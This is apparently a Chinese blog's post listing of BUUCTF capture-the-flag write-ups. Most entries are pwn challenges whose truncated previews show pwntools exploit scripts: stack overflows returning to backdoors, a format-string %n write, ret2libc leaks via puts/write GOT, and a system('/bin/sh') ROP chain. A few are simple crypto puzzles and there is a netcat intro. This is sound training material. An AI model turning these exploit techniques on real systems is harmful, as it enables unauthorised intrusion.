- 博客(30)
- 收藏
- 关注
原创 BUUCTF-Pwn-pwn2_sctf_2016
expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/pwn2_sctf_2016')p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf']printf_got=elf.got['printf']main=0x80485b8p.sendlineafter(b'read? ',b'-1')payload=b'a'*(0x2c+4)+p32(p
2022-03-25 23:32:31
265
原创 BUUCTF-Pwn-bjdctf_2020_babystack2
expfrom pwn import*p=remote('node4.buuoj.cn',26509) backdoor=0x0400726ret=0x40073ap.sendlineafter(b'name:\n',b'-1')payload=b'a'*(0x10+8)+p64(ret)+p64(backdoor)p.sendlineafter(b'name?\n',payload)p.interactive()
2022-03-25 22:40:06
159
原创 BUUCTF-Pwn-jarvisoj_fm
expfrom pwn import*p=remote('node4.buuoj.cn',27346) x_addr=0x804A02Cpayload=p32(x_addr)+b'%11$n'p.sendline(payload)p.interactive()
2022-03-25 21:35:17
2743
原创 BUUCTF-Pwn-bjdctf_2020_babyrop
expfrom pwn import*from LibcSearcher import *p=process('/home/lhb/桌面/bjdctf_2020_babyrop')elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop')p=remote('node4.buuoj.cn',27346) main=0x4006adpop_rdi_ret=0x400733puts_plt=elf.plt['puts']puts_got=elf.got['puts']
2022-03-25 21:18:18
421
原创 BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/2018_rop')p=remote('node4.buuoj.cn',26218) main=0x80484C6write_plt=elf.plt['write']write_got=elf.got['write']payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3
2022-03-25 21:08:57
143
原创 BUUCTF-Pwn-ciscn_2019_ne_5
expfrom pwn import*elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5')p=remote('node4.buuoj.cn',28555) str_sh=0x80482EAsystem_plt=elf.plt['system']p.sendline(b'administrator')p.sendline(b'1')payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh)p.sendline(
2022-03-25 10:36:10
165
原创 BUUCTF-Crypto-变异凯撒
题目截图附件截图从格式可以知道afZ_表示的是flagf-a=102-97=5l-f=108-102=6a-Z=97-90=7g-_=103-95=8所以明文与密文之间的偏移是从5开始依次加一解密得flag为flag{Caesar_variation}
2022-02-22 10:26:34
236
原创 BUUCTF-Crypto-password
题目截图附件截图根据姓名和生日构造密码,从key的格式可以知道密码的长度为10位,生日19900315加上张三拼音的缩写zs刚好10位,尝试不同的大小写和排列组合得到flag为flag{zs19900315}
2022-02-22 10:04:37
1210
原创 BUUCTF-Pwn-[OGeek2019]babyrop
题目截图检查文件信息开启了NX和Full RELOR用IDA打开,反汇编查看主函数查看函数sub_804871Fbuf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断查看函数sub_80487D0a1的值等于上一个函数中的
2022-02-16 16:19:18
2220
原创 BUUCTF-Pwn-jarvisoj_level2
题目截图检查文件信息,开启了NX用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用查看函数表存在system函数进入主函数反汇编查看进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshellexpfrom pwn import*r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024call_system=0x8048
2022-02-15 12:13:09
2386
原创 BUUCTF-Pwn-ciscn_2019_n_8
题目截图检查文件信息,开了NX,Canary和PIE反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节expfrom pwn import*r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17)r.sendlineafter(b'\n', payload)r.interactive() #开启交互
2022-02-15 10:12:20
306
原创 BUUCTF-Pwn-[第五空间2019 决赛]PWN5
题目截图检查文件信息这是一个32位的程序,开启了NX和Canary用IDA打开查看找到来能getshell的代码反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell测试我们输入的内容在栈中的位置,是第10个expfrom pwn import*r=remote('node4.buuoj.cn',28850) addr=
2022-02-15 09:31:37
457
原创 BUUCTF-Pwn-ciscn_2019_c_1
题目截图检查一下文件信息开启了NX,64位的文件使用IDA打开按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串一番寻找也没有找到system函数查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手找到gets函数所在位置查看在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用双击进入查看调用函数运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
2022-02-14 19:30:57
3694
2
原创 BUUCTF-Pwn-rip
题目截图使用IDA打开附件,反汇编为C语言找到两个函数可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186所以我们可以构造payload=‘a’*23+
2021-11-14 16:23:34
2932
原创 BUUCTF-Crypto-摩丝
题目截图附件截图摩斯密码,使用在线工具解密解密网站:http://www.all-tool.cn/Tools/morse/?&rand=a6fe165940aeafb30e8e9ba53544f649
2021-10-31 15:57:48
421
原创 BUUCTF-Crypto-一眼就解密
题目截图从题目可以看出使用了base64加密使用在线工具解密解密网站:https://base64.us/
2021-10-31 15:44:34
126
原创 BUUCTF-Pwn-test_your_nc
题目截图从题目描述可以看出,要使用要nc(netcat)命令先了解一下netcat命令是什么官网:http://netcat.sourceforge.net/netcat是一款调试 TCP/UDP 网络连接的利器,常被称作网络调试的瑞士军刀nc 有以下功能:模拟 TCP 服务端模拟 TCP 客户端模拟 UDP 服务端模拟 UDP 客户端模拟 UNIX socket 服务端模拟 UNIX socket 客户端端口扫描传输文件将服务器 bash 暴露给远程客户端内网穿透,反向获取
2021-10-31 15:20:39
862
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人